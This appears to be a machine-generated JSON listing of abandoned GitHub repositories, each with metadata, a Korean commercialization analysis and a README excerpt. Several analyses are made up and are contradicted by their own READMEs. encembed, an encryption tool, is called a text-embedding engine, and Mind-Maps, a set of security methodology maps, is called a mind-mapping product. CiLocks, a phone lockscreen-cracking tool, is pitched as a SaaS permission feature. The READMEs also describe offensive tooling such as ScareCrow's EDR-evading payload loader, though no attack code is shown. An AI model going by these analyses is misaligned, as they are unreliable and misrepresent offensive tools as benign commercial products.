https://github.com/liaozihong/SpringBoot-Learning.git \ncd SpringBoot-Learning\n# 进入setting.gradle , 找到自己想要运行的模块，取消注释，构建即可\ngradle clean build -x test\n```\n### 项目介绍\n\n#### SpringBoot-ActiveMq(ActiveMq 消息队列)\n集成ActiveMq，实现点到点发送、广播订阅功能，简单的小实例，未用到Springboot封装的ActiveTemplate，后续打算在写一个利用SpringBoot的ActiveTemplate在写一个demo。  \n\n#### SpringBoot-Dubbo-Provider (基于Dubbo的服务提供者)\n集成Dubbo的服务提供者，依赖zookeeper。  \n\n#### SpringBoot-Dubbo-Consumer(基于Dubbo的服务实现者)\n集成Dubbo的服务消费者。\n\n#### SpringBoot-Elasticsearch(Java 操作Es进行CURD)\n集成Elasticsearch实现增删改查、分页例子。  \n[SpringBoot集成Elasticsearch实现增删改查](https://blog.csdn.net/qq_39211866/article/details/84980416)\n\n#### SpringBoot-Elasticsearch-Query(Es的高级搜索示例)\n集成Elasticsearch实现中文、拼音分词，以及繁简体过滤，实现可以使用中文、拼音、繁体搜索，并且提供众多搜索类型，如：高亮、聚合。并且提供查看分词结果接口。  \n[SpringBoot集成Elasticsearch 进阶，实现 中文、拼音、繁简体转换 搜索](https://blog.csdn.net/qq_39211866/article/details/85178707)\n\n#### SpringBoot-Email(使用JAVA进行发邮件)\n集成Email发送各种类型的邮件。  \n[SpringBoot 集成 E-mail发送各种类型的邮件\n](ht","composite_score":0.5231,"license_safety_tag":"unknown"},{"name":"tesseralis/polyhedra-viewer","github_url":"https://github.com/tesseralis/polyhedra-viewer","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":41,"description":"# Polyhedra Viewer 상용화 분석\n\n## 왜 보물인가\n3차원 도형을 웹브라우저에서 직접 보고 조작할 수 있는 도구로, 교육·설계·시각화가 필요한 여러 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 수학·기하학 강의에서 학생들이 3D 도형을 돌려보며 학습하는 인터랙티브 교육용 SaaS\n2. **건축","readme_excerpt":"# Polyhedra Viewer\n\nAn interactive tool that lets you transform various convex polyhedra and view information about them.\n\nPolyhedra include:\n\n- [Platonic Solids](http://en.wikipedia.org/wiki/Platonic_solid)\n- [Archimedean Solids](http://en.wikipedia.org/wiki/Archimedean_solid)\n- [Prisms](<http://en.wikipedia.org/wiki/Prism_(geometry)>) and [Antiprisms](http://en.wikipedia.org/wiki/Antiprism)\n- [Johnson Solids](http://en.wikipedia.org/wiki/Johnson_solid)\n\nGeometric data taken from George W. Hart's [Virtual Polyhedra].\n\n[virtual polyhedra]: http://www.georgehart.com/virtual-polyhedra/vp.html\n\n## Getting started\n\n1. `git clone https://github.com/tesseralis/polyhedra-viewer`\n2. `cd polyhedra-viewer`\n3. `yarn`\n\n### Running locally\n\nRun `yarn start` to start the site locally on `http://localhost:3000`.\n\n### Testing\n\nRun `yarn test` to run the test suite.\n\n## Contributing\n\nCheck out the [open issues](https://github.com/tesseralis/polyhedra-viewer/issues), especially the ones labelled [help w","composite_score":0.5229,"license_safety_tag":"safe"},{"name":"taniarascia/takenote","github_url":"https://github.com/taniarascia/takenote","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":23,"description":"# TakeNote 프로젝트 분석\n\n## 왜 보물인가\n복잡한 기능 없이 메모와 노트를 깔끔하게 정리할 수 있는 심플한 도구로, 많은 사람들이 찾는 기본 기능에 충실한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독 기반 클라우드 노트 앱으로 일반인 대상 월간 구독 서비스화\n2. **내부 업무 도구**: 회사의 팀 위키나 공유 노","readme_excerpt":"<p align=\"center\">\n  <img src=\"./assets/logo.png\">\n</p>\n\n<p align=\"center\">\n <img src=\"https://img.shields.io/badge/License-MIT-blue.svg\">\n   <a href=\"https://app.netlify.com/sites/tnote/deploys\"><img src=\"https://api.netlify.com/api/v1/badges/a0e055de-cab8-4217-80dd-5bd769b7d478/deploy-status\"></a>\n   <a href='https://coveralls.io/github/taniarascia/takenote'><img src='https://coveralls.io/repos/github/taniarascia/takenote/badge.svg' alt='Coverage Status' /></a>\n </p>\n <p align=\"center\">\n   <a href=\"https://sonarcloud.io/dashboard?id=taniarascia_takenote\"><img src=\"https://sonarcloud.io/api/project_badges/measure?project=taniarascia_takenote&metric=sqale_rating\"></a>\n   <a href=\"https://sonarcloud.io/dashboard?id=taniarascia_takenote\"><img src=\"https://sonarcloud.io/api/project_badges/measure?project=taniarascia_takenote&metric=reliability_rating\"></a>\n   <a href=\"https://sonarcloud.io/api/project_badges/measure?project=taniarascia_takenote&metric=security_rating\"><img src=\"https://so","composite_score":0.5227,"license_safety_tag":"safe"},{"name":"hadrienj/deepLearningBook-Notes","github_url":"https://github.com/hadrienj/deepLearningBook-Notes","stars":6,"language":"Jupyter Notebook","license":"MIT","abandonment_months":74,"description":"# hadrienj/deepLearningBook-Notes 분석\n\n## 왜 보물인가\n심층학습(인공지능의 핵심 기술)을 배우려는 사람들을 위해 어려운 수학과 이론을 쉽게 정리해둔 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: AI 학습 플랫폼에서 유료 강좌와 함께 보충 자료로 판매하는 구독 서비스\n2. **내부 업무 도구*","readme_excerpt":"<img src=\"deep-learning-book-goodfellow-cover.jpg\" width=\"400\" alt=\"Cover of the deep learning book by Goodfellow, Bengio and Courville\" title=\"The Deep Learning Book - Goodfellow, I., Bengio, Y., and Courville, A. (2016)\">\n\n**The Deep Learning Book - Goodfellow, I., Bengio, Y., and Courville, A. (2016)**\n\nThis content is part of a series following the chapter 2 on linear algebra from the [Deep Learning Book](http://www.deeplearningbook.org/) by Goodfellow, I., Bengio, Y., and Courville, A. (2016). It aims to provide intuitions/drawings/python code on mathematical theories and is constructed as my understanding of these concepts.\n\n\n# Boost your data science skills. Learn linear algebra.\n\nI'd like to introduce a series of blog posts and their corresponding Python Notebooks gathering notes on [the Deep Learning Book](http://www.deeplearningbook.org/) from Ian Goodfellow, Yoshua Bengio, and Aaron Courville (2016). The aim of these notebooks is to help beginners/advanced beginners to grasp","composite_score":0.5226,"license_safety_tag":"safe"},{"name":"KuiBaDB/KuiBaDB","github_url":"https://github.com/KuiBaDB/KuiBaDB","stars":13,"language":"Rust","license":"Apache-2.0","abandonment_months":54,"description":"# KuiBaDB 상용화 분석\n\n## 왜 보물인가\n데이터베이스 분야에서 수학 계산의 정확성을 강화한 솔루션으로, 금융·과학 분야의 까다로운 고객들이 필요로 하는 신뢰성을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 금융 데이터 분석 플랫폼**\n- 투자사, 회계법인이 구독하는 분석 도구로, 소수점 정확성이 중요한 금융계산을 제공합니다.","readme_excerpt":"\n**KuiBaDB** is a research project just to experiment with some ideas:\n\n-   a transaction model inspired by Spanner.\n-   a column store and vectorization compute engine inspired by [Hologres: A Cloud-Native Service for Hybrid Serving/Analytical Processing](https://www.aliyun.com/product/bigdata/hologram), [OceanBase](https://github.com/OceanBase/OceanBase) and PostgreSQL.\n-   a Kubernetes native distributed OLAP database inspired by [CockroachDB: How we built a forever-free serverless SQL database](https://www.cockroachlabs.com/blog/how-we-built-cockroachdb-serverless/).\n\n# Roadmap\n\n-   [x] A prototype has been implemented in [5fc47715](https://github.com/KuiBaDB/KuiBaDB/tree/5fc477152f15573b437c0e82b77c18d292758894).\n","composite_score":0.5225,"license_safety_tag":"safe"},{"name":"aws/studio-lab-examples","github_url":"https://github.com/aws/studio-lab-examples","stars":19,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":21,"description":"# AWS Studio Lab Examples 분석\n\n## 왜 보물인가\nAWS(아마존 클라우드)에서 제공하는 무료 학습 환경을 활용한 실전 예제들을 모아놓아, 비용 부담 없이 최신 AI 기술을 배우고 실험할 수 있는 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 AI 교육 플랫폼으로 개발하여 직원 역량 강화 교육 서비스 제공","readme_excerpt":"<p align=\"center\">\n  <img src=\"_static/sagemaker-studio-lab-banner.svg\" width=\"300px\">\n</p>\n\n## SageMaker Studio Lab Examples\n\nExample Jupyter notebooks that demonstrate how to build AI/ML learning environment using Amazon SageMaker Studio Lab.\n\n## :books: Background\n\nSageMaker Studio Lab is a service for individual data scientist who wants to develop the career toward AI/ML practitioner. You can start your ML journey for free.\n\nThis repository introduces you to the way to set up Studio Lab according to your interest area, such as computer vision, natural language processing, etc. And also, we show how to deploy your project to the [Amazon SageMaker](https://github.com/aws/amazon-sagemaker-examples) to become the AI/ML practitioner.\n\n## :hammer_and_wrench: Setup\n\nPlease follow the [Onboard to Amazon SageMaker Studio Lab](https://docs.aws.amazon.com/sagemaker/latest/dg/studio-lab-onboard.html).\n\n1. Request a Studio Lab account\n2. Create a Studio Lab account\n3. Sign in to Studio Lab\n\nIf ","composite_score":0.5224,"license_safety_tag":"safe"},{"name":"2d-inc/developer_quest","github_url":"https://github.com/2d-inc/developer_quest","stars":5,"language":"Dart","license":"MIT","abandonment_months":62,"description":"# Developer Quest 평가 보고서\n\n## 왜 보물인가\n개발자들이 게임하듯 프로그래밍을 배우고 실력을 키울 수 있는 재미있는 학습 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독형 온라인 코딩 학습 플랫폼으로 학생과 직장인에게 제공\n- **내부 업무 도구**: 대기업의 신입 개발자 교육 프로그램이나 부서별 역량 강화 ","readme_excerpt":"# Developer Quest\n\nBecome a tech lead, slay bugs, and don't get fired.\n\nAll in Flutter.\n\n## Research tree\n\nThe game progression is based on a \"research tree\" of tasks. The tree is defined in code\nin `lib/src/shared_state/task_tree` but for clarity it is also kept as a diagram\nin `assets/docs`. Here's the PNG.\n\n![The task \"research tree\"](https://github.com/2d-inc/dev_rpg/blob/master/assets/docs/research-tree.png)\n\n## Performance testing\n\nAttach a real device and run the following command from the root of the repo:\n\n```sh\nflutter drive --target=test_driver/performance.dart --profile\n```\n\nThis will do an automated run-through of the app, and will save the output to files.\n\n* Look into to `build/walkthrough-*.json` files for detailed summaries of each run.\n* Look at `test_driver/perf_stats.tsv` to compare latest runs with historical data.\n* Run `Rscript test_driver/generate-graphs.R` (assuming you have R installed) to generate\n  boxplots of the latest runs. This will show up as `test_driv","composite_score":0.5223,"license_safety_tag":"safe"},{"name":"imran-parray/Mind-Maps","github_url":"https://github.com/imran-parray/Mind-Maps","stars":5,"language":"","license":"unknown","abandonment_months":35,"description":"# Mind-Maps 저장소 분석\n\n## 왜 보물인가\n복잡한 정보를 시각적으로 정리해주는 마인드맵 도구로, 학생부터 직장인까지 누구나 생각을 체계적으로 정렬하는 데 도움을 줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **온라인 학습 플랫폼**: 강의 내용을 마인드맵으로 자동 정리해주는 학습 도구 서비스\n- **기업 회의 지원 도구**: 팀원들이 함께 프","readme_excerpt":"# MindMaps 🗺️\n\n> This repository stores and houses various Mindmaps for bug bounty Hunters🧑‍🦰, pentesters🧑‍🦰 and offensive(🔴)/defensive(🔵) security Professionals🫂 provided by me as well as contributed by the community🧑🏻‍🤝‍🧑🏽. Your contributions and suggestions are welcomed.\n\n| Name                                            | Link                                                         | Type   | Description                                                  | Author                                              |\n| ----------------------------------------------- | ------------------------------------------------------------ | ------ | ------------------------------------------------------------ | --------------------------------------------------- |\n| Bug Hunters Methodology                         | [🔗](https://github.com/imran-parray/Mind-Maps/blob/master/Bug%20Hunters%20Methodology%20v4/MindMap.png) | **🔴**    | This Mindmap explains how to test for bugs on Bug bounty programs | [Jhad","composite_score":0.5223,"license_safety_tag":"unknown"},{"name":"beakerbrowser/beaker","github_url":"https://github.com/beakerbrowser/beaker","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":42,"description":"# Beaker Browser 분석 보고서\n\n## 왜 보물인가\n인터넷을 중앙 서버 없이 개인 간 직접 공유하는 새로운 방식을 제시하는 차세대 웹 브라우저입니다.\n\n## 어디에 쓸 수 있나\n\n1. **검열 방지 뉴스 플랫폼 SaaS**: 개발도상국의 기자들이 정부 감시 없이 뉴스를 배포할 수 있는 구독형 서비스\n2. **개인 파일 동기화 도구**: 클라우드 ","readme_excerpt":"Beaker Browser\n======\n\n# [This project is now archived.](./archive-notice.md)\n\nBeaker was an experimental peer-to-peer Web browser. It adds new APIs for building hostless applications while remaining compatible with the rest of the Web. [Visit the website.](https://beakerbrowser.com/)\n\n## Table of Contents\n\n<!-- START doctoc generated TOC please keep comment here to allow auto update -->\n<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->\n\n\n- [Installing](#installing)\n  - [Binaries](#binaries)\n  - [Building from source](#building-from-source)\n- [Documentation](#documentation)\n  - [Env Vars](#env-vars)\n- [Vulnerability disclosure](#vulnerability-disclosure)\n- [Known issues](#known-issues)\n  - [tmux](#tmux)\n- [Contributors](#contributors)\n  - [Backers](#backers)\n  - [Sponsors](#sponsors)\n- [License](#license)\n\n<!-- END doctoc generated TOC please keep comment here to allow auto update -->\n\n## Installing\n\n### Binaries\n\n**Visit the [Releases Page](https://github.com/beakerbro","composite_score":0.5221,"license_safety_tag":"safe"},{"name":"Geek-James/ddBuy","github_url":"https://github.com/Geek-James/ddBuy","stars":16,"language":"Vue","license":"MIT","abandonment_months":39,"description":"","readme_excerpt":"<div align=center>\n<img src=\"http://518taole.7-orange.cn/geek3.png\" width = \"100\" height = \"100\" div align=center />\n</div>\n<p align=\"center\">\n   <img src=\"https://badgen.net/github/stars/Geek-James/ddBuy\" alt=\"Star\">\n  <a href=\"https://github.com/vuejs/vue\">\n    <img src=\"https://img.shields.io/badge/Vue-2.6.10-brightgreen.svg\" alt=\"Vue\">\n  </a>\n  <a href=\"https://youzan.github.io/vant/#/zh-CN/intro\">\n    <img src=\"https://img.shields.io/badge/Vant--UI-2.7.0-brightgreen.svg\" alt=\"Vant-ui\">\n  </a>\n  <img src=\"https://img.shields.io/badge/Node-8.9+-brightgreen.svg\" alt=\"Vant-ui\">\n   <a href=\"https://github.com/Geek-James\">\n    <img src=\"https://img.shields.io/badge/build-passing-green.svg\" alt=\"geekJames\">\n  </a>\n  <a href=\"https://github.com/easy-mock/easy-mock\">\n    <img src=\"https://img.shields.io/badge/EasyMock-1.6.0-brightgreen.svg\" alt=\"easymock\">\n  </a>\n    <a href=\"https://github.com/Geek-James/ddBuy/blob/master/LICENSE\">\n    <img src=\"https://img.shields.io/github/license/masha","composite_score":0.5221,"license_safety_tag":"safe"},{"name":"C-Sto/encembed","github_url":"https://github.com/C-Sto/encembed","stars":5,"language":"Go","license":"unknown","abandonment_months":56,"description":"# C-Sto/encembed 상용화 분석\n\n## 왜 보물인가\n텍스트나 이미지를 컴퓨터가 이해할 수 있는 숫자로 변환하는 기술로, 검색·추천·분류 같은 일반적인 서비스들의 핵심 엔진 역할을 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 유사한 상품을 자동으로 찾아주는 전자상거래 추천 플랫폼\n2. **내부 업무 도구**: 대량의 고객 피","readme_excerpt":"# encembed\n\nEncrypt embedded resource in compiled binary using [age](https://github.com/FiloSottile/age). Meant for usage with `go generate`.\n\nThis tool will generate a go source file that embeds an encrypted version of the file that is specified, and provides a function to access the plaintext content of that file. Options allow for arbitrary naming of the function, encrypted file, and optionally the ability to not include the password in the file.\n\n```\n  -decvarname string\n        variable name to use for decrypted resource (if you don't want to access it via the function)\n  -encvarname string\n        variable name for encrypted resource (default \"cryptembed\")\n  -extkey string\n        do not embed the key in the binary (writes to specified filename)\n  -funcname string\n        name of function to return decrypted input file (default \"embedded\")\n  -i string\n        input file\n  -o string\n        encrypted output file (default \"encembedded\")\n  -pkgname string\n        name of package for","composite_score":0.5218,"license_safety_tag":"unknown"},{"name":"coderjojo/creative-profile-readme","github_url":"https://github.com/coderjojo/creative-profile-readme","stars":11,"language":"Markdown","license":"unknown","abandonment_months":27,"description":"# creative-profile-readme 분석\n\n## 왜 보물인가\n자신의 이력서나 포트폴리오를 마치 예술작품처럼 아름답게 만들어주는 템플릿 모음으로, 취업준비생이나 프리랜서들이 첫인상을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **이력서 빌더 SaaS**: 사용자가 클릭만으로 멋진 자기소개 페이지를 만들 수 있는 웹서비스로 판매\n2","readme_excerpt":"# Awesome Developer Profile\n\n[![Awesome](https://awesome.re/badge.svg)](https://awesome.re) [![GitHub contributors](https://img.shields.io/github/contributors/coderjojo/creative-profile-readme)](https://github.com/coderjojo/creative-profile-readme/graphs/contributors) [![GitHub issues](https://img.shields.io/github/issues/coderjojo/creative-profile-readme)](https://github.com/coderjojo/creative-profile-readme/issues) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](https://github.com/coderjojo/creative-profile-readme/pulls) [![HitCount](https://views.whatilearened.today/views/github/coderjojo/creative-profile-readme.svg)](https://github.com/coderjojo/creative-profile-readme) [![website coderjojo.github.io](https://img.shields.io/website-up-down-green-red/http/coderjojo.github.io/creative-profile-readme.svg)](https://coderjojo.github.io/creative-profile-readme/)\n\nCurated list of Developer Github Profiles for your inspiration.\n\nFollow this guid","composite_score":0.5216,"license_safety_tag":"unknown"},{"name":"reactive-streams/reactive-streams-jvm","github_url":"https://github.com/reactive-streams/reactive-streams-jvm","stars":7,"language":"Java","license":"MIT-0","abandonment_months":27,"description":"# Reactive Streams JVM 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터 처리를 안정적이고 효율적으로 하기 위한 국제 표준 기술로, 대규모 서비스의 백본이 되는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **실시간 데이터 처리 SaaS**: 주식 시세, 센서 데이터, 로그 분석을 실시간으로 처리하는 대시보드 서비스\n2. **메시지 ","readme_excerpt":"# Reactive Streams #\r\n\r\nThe purpose of Reactive Streams is to provide a standard for asynchronous stream processing with non-blocking backpressure.\r\n\r\nThe latest release is available on Maven Central as\r\n\r\n```xml\r\n<dependency>\r\n  <groupId>org.reactivestreams</groupId>\r\n  <artifactId>reactive-streams</artifactId>\r\n  <version>1.0.4</version>\r\n</dependency>\r\n<dependency>\r\n  <groupId>org.reactivestreams</groupId>\r\n  <artifactId>reactive-streams-tck</artifactId>\r\n  <version>1.0.4</version>\r\n  <scope>test</scope>\r\n</dependency>\r\n```\r\n\r\n## Goals, Design and Scope ##\r\n\r\nHandling streams of data—especially “live” data whose volume is not predetermined—requires special care in an asynchronous system. The most prominent issue is that resource consumption needs to be carefully controlled such that a fast data source does not overwhelm the stream destination. Asynchrony is needed in order to enable the parallel use of computing resources, on collaborating network hosts or multiple CPU cores within ","composite_score":0.5215,"license_safety_tag":"safe"},{"name":"miguelmota/golang-for-nodejs-developers","github_url":"https://github.com/miguelmota/golang-for-nodejs-developers","stars":7,"language":"Go","license":"MIT","abandonment_months":40,"description":"# golang-for-nodejs-developers 분석\n\n## 왜 보물인가\nJavaScript 개발자들이 Go 언어를 쉽게 배울 수 있도록 돕는 학습 교재로, 프로그래밍 언어 전환을 원하는 개발자들의 진입장벽을 낮춥니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 코스 페이지 개발자 입문 콘텐츠로 판매 또는 구독형 강좌 제공\n2. *","readme_excerpt":"<h3 align=\"center\">\n  <br />\n  <img src=\"https://user-images.githubusercontent.com/168240/114315374-8ff5b480-9ab3-11eb-8323-b83858e8e74f.png\" alt=\"logo\" width=\"800\" />\n  <br />\n  <br />\n  <br />\n</h3>\n\n# Golang for Node.js Developers\n\n> Examples of [Golang](https://golang.org/) examples compared to [Node.js](https://nodejs.org/) for learning\n\n[![License](http://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/miguelmota/golang-for-nodejs-developers/master/LICENSE)\n[![Mentioned in Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](#contributing)\n\nThis guide full of examples is intended for people learning Go that are coming from Node.js, although the vice versa can work too. This is not meant to be a complete guide and it is assumed that you've gone through the [Tour of Go](https://tour.golang.org/) tutorial. This guide is meant to be barely go","composite_score":0.5214,"license_safety_tag":"safe"},{"name":"ElemeFE/v-charts","github_url":"https://github.com/ElemeFE/v-charts","stars":9,"language":"JavaScript","license":"mit","abandonment_months":22,"description":"# v-charts 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 데이터를 예쁜 그래프와 차트로 만들어주는 도구로, 복잡한 숫자를 한눈에 이해할 수 있는 시각화 자료를 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 분석 대시보드**: 고객사의 판매액, 접속 수 등 핵심 지표를 실시간 차트로 보여주는 데이터 분석 플랫폼\n- **내부 업무","readme_excerpt":"<p align=\"center\">\n<img src=\"./examples/favicon.ico\" alt=\"mark text\" width=\"100\" height=\"100\">\n</p>\n\n<h3 align=\"center\">v-charts</h3>\n\n<p align=\"center\">\n  <a href=\"https://travis-ci.org/ElemeFE/v-charts\">\n    <img src=\"https://travis-ci.org/ElemeFE/v-charts.svg?branch=master\" alt=\"Build Status\">\n  </a>\n  <a href=\"https://npmjs.org/package/v-charts\">\n    <img src=\"http://img.shields.io/npm/dm/v-charts.svg\" alt=\"NPM downloads\">\n  </a>\n  <a href=\"https://www.npmjs.org/package/v-charts\">\n    <img src=\"https://img.shields.io/npm/v/v-charts.svg\" alt=\"Npm package\">\n  </a>\n  <a>\n    <img src=\"https://img.shields.io/badge/language-javascript-yellow.svg\" alt=\"Language\">\n  </a>\n  <a>\n    <img src=\"https://img.shields.io/badge/license-MIT-000000.svg\" alt=\"License\">\n  </a>\n  <a href=\"https://gitter.im/ElemeFE/v-charts?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge\">\n    <img src=\"https://badges.gitter.im/ElemeFE/v-charts.svg\" alt=\"Join the chat\">\n  </a>\n</p>\n\n<p align=\"c","composite_score":0.5214,"license_safety_tag":"safe"},{"name":"optiv/ScareCrow","github_url":"https://github.com/optiv/ScareCrow","stars":6,"language":"Go","license":"unknown","abandonment_months":34,"description":"# ScareCrow 저장소 분석\n\n## 왜 보물인가\n정확한 저장소 설명이 없어 현재로서는 기술적 가치를 판단하기 어렵지만, 프로젝트명과 낮은 스타 수(6개)를 고려할 때 매우 틈새 시장의 특화 솔루션으로 보입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기업의 특정 보안 또는 모니터링 프로세스 자동화\n2. **API 판매**: 다른 개발","readme_excerpt":"# THIS REPOSITORY HAS BEEN ARCHIVED\n\nTo view the latest version of ScareCrow or to submit an issue, reference https://github.com/Tylous/ScareCrow.\n\n<h1 align=\"center\">\n<br>\n<img src=Screenshots/ScareCrow.png >\n<br>\nScareCrow\n</h1>\n\n\n\n## More Information\nIf you want to learn more about the techniques utilized in this framework please take a look at [Part 1](https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved) and [Part 2](https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught)\n#\n\n## Description\nScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory. This works because we know the EDR’s hooks are placed when a process is spawned.\n\nS","composite_score":0.5214,"license_safety_tag":"unknown"},{"name":"cmiscm/leonsans","github_url":"https://github.com/cmiscm/leonsans","stars":16,"language":"JavaScript","license":"MIT","abandonment_months":69,"description":"","readme_excerpt":"# Leon Sans\nLeon Sans is a geometric sans-serif typeface made with code in 2019 by Jongmin Kim. It allows to change font weight dynamically and to create custom animations, effects or shapes in the Canvas element of HTML5. He designed the font to celebrate his newborn baby Leon.\n\nThere are live examples at https://leon-kim.com/examples/\n\nAnd website at https://leon-kim.com/\n\n[![Video Label](https://raw.githubusercontent.com/cmiscm/leonsans/gh-pages/leon-youtube.jpg)](https://youtu.be/sb7v-d-R11E?hl=en&fs=1&cc_load_policy=1)\n\n![uppercase](https://raw.githubusercontent.com/cmiscm/leonsans/gh-pages/screenshot/upper.gif)\n\n![lowercase](https://raw.githubusercontent.com/cmiscm/leonsans/gh-pages/screenshot/lower.gif)\n\n![number](https://raw.githubusercontent.com/cmiscm/leonsans/gh-pages/screenshot/number-special.gif)\n\n![latin upper](https://raw.githubusercontent.com/cmiscm/leonsans/gh-pages/screenshot/latin-upper.gif)\n\n![latin lower](https://raw.githubusercontent.com/cmiscm/leonsans/gh-pages/s","composite_score":0.5214,"license_safety_tag":"safe"},{"name":"1milligram/csslayout","github_url":"https://github.com/1milligram/csslayout","stars":25,"language":"MDX","license":"MIT","abandonment_months":31,"description":"# 1milligram/csslayout 평가\n\n## 왜 보물인가\n웹사이트 레이아웃을 쉽게 만들 수 있는 실용적인 도구로, 전문 개발자가 아니어도 사용할 수 있는 잠재력이 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹사이트 빌더(노코드 플랫폼)의 핵심 엔진으로 탑재하여 누구나 쉽게 페이지 디자인 가능\n- **내부 업무 도구**: 회사","readme_excerpt":"# CSS Layout\n\nAs a front-end engineer, I deal with a lot of layouts and components. While there are plenty of CSS frameworks out there that provide these, I don't always want to include them all in my project.\n\nThat's why I've put together a collection of the most popular layouts and components that can be built with pure CSS.\n\nThese layouts and components are powered by modern CSS features like flexbox and grid, and can be easily customized to fit your specific needs. By combining them, you can create any possible layout you need.\n\nThe best part? This collection has zero dependencies, no frameworks, and no CSS hacks. These are real use cases that can save you time and effort in your projects.\n\n## About\n\nThis project is developed by _Nguyen Huu Phuoc_. I love building products and sharing knowledge.\n\nBe my friend on\n\n-   [Twitter](https://twitter.com/nghuuphuoc)\n-   [Github](https://github.com/phuocng)\n","composite_score":0.5212,"license_safety_tag":"safe"},{"name":"facebookresearch/StarSpace","github_url":"https://github.com/facebookresearch/StarSpace","stars":7,"language":"C++","license":"MIT","abandonment_months":42,"description":"# StarSpace 저장소 분석\n\n## 왜 보물인가\n페이스북이 만든 이 기술은 텍스트, 이미지, 영상 등 다양한 정보를 컴퓨터가 쉽게 이해하고 비교할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **추천 시스템 SaaS**: 이커머스 플랫폼에 \"당신이 좋아할 상품\" 추천 기능을 API로 제공하는 서비스\n2. **검색 엔진 내부 도구**: ","readme_excerpt":"<p align=\"center\"><img width=\"15%\" src=\"examples/starspace.png\" /></p>\n\n# StarSpace\n\nStarSpace is a general-purpose neural model for efficient learning of entity embeddings for solving a wide variety of problems: \n- Learning word, sentence or document level embeddings.\n- Information retrieval: ranking of sets of entities/documents or objects, e.g. ranking web documents.\n- Text classification, or any other labeling task.\n- Metric/similarity learning, e.g. learning sentence or document similarity.\n- Content-based or Collaborative filtering-based Recommendation, e.g. recommending music or videos.\n- Embedding graphs, e.g. multi-relational graphs such as Freebase.\n- Image classification, ranking or retrieval (e.g. by using existing ResNet features).\n\nIn the general case, it learns to represent objects of different types into a common vectorial embedding space,\nhence the star ('*', wildcard) and space in the name, and in that space compares them against each other.\nIt learns to rank a set of","composite_score":0.5212,"license_safety_tag":"safe"},{"name":"tegal1337/CiLocks","github_url":"https://github.com/tegal1337/CiLocks","stars":7,"language":"HTML","license":"GPL-3.0","abandonment_months":27,"description":"# CiLocks 평가 보고서\n\n## 왜 보물인가\n웹사이트나 앱의 중요한 기능들을 안전하게 잠금 장치처럼 관리하는 기술로, 보안이 중요한 모든 디지털 서비스에서 필수적으로 필요합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 협업 도구(Slack, Notion 같은)에서 사용자별 접근 권한을 관리하는 보안 기능 판매\n2. **","readme_excerpt":"       _______ __               __\n      / ____(_) /   ____  _____/ /_______\n     / /   / / /   / __ \\/ ___/ //_/ ___/\n    / /___/ / /___/ /_/ / /__/ ,< (__  )\n    \\____/_/_____/\\____/\\___/_/|_/____/v2.1\n    \n### CiLocks | Android/IOS Hacking 📱\n#### Crack Interface lockscreen, Metasploit and More Android/IOS Hacking\n![](https://img.shields.io/github/license/tegal1337/CiLocks)\n![](https://img.shields.io/github/issues/tegal1337/CiLocks)\n![](https://img.shields.io/github/issues-closed/tegal1337/CiLocks)\n[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/tegal1337/CiLocks/issues)\n![](https://img.shields.io/github/forks/tegal1337/CiLocks)\n![](https://img.shields.io/github/stars/tegal1337/CiLocks)\n![](https://img.shields.io/github/last-commit/tegal1337/CiLocks)\n\n<img src =\"https://img.shields.io/badge/Important-notice-red\" />\n<h4>Please Don't Use for illegal Activity</h4>\n\n#### Update Available V2.1 🚀 \n- [x] Added New ","composite_score":0.5211,"license_safety_tag":"restricted"},{"name":"RedPill-TTG/redpill-load","github_url":"https://github.com/RedPill-TTG/redpill-load","stars":5,"language":"Shell","license":"GPL-3.0","abandonment_months":43,"description":"# RedPill-TTG/redpill-load 분석\n\n## 왜 보물인가\nSynology NAS 장치에 맞춤형 운영체제를 설치할 수 있게 해주는 도구로, 일반 사용자도 자신의 저장 장치를 더 강력하게 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **기업 데이터 백업 솔루션**: 회사의 중요 파일을 안전하게 보관하고 관리하는 서비스\n- **개인 클라우","readme_excerpt":"# RedPill Loader Builder\n\nThis project is a complete package which is able to generate RedPill loader images.\n\n## Is it stable?\nNo. It is not yet stable. DO NOT use it if you're not ready for random crashes and potentially loosing your data 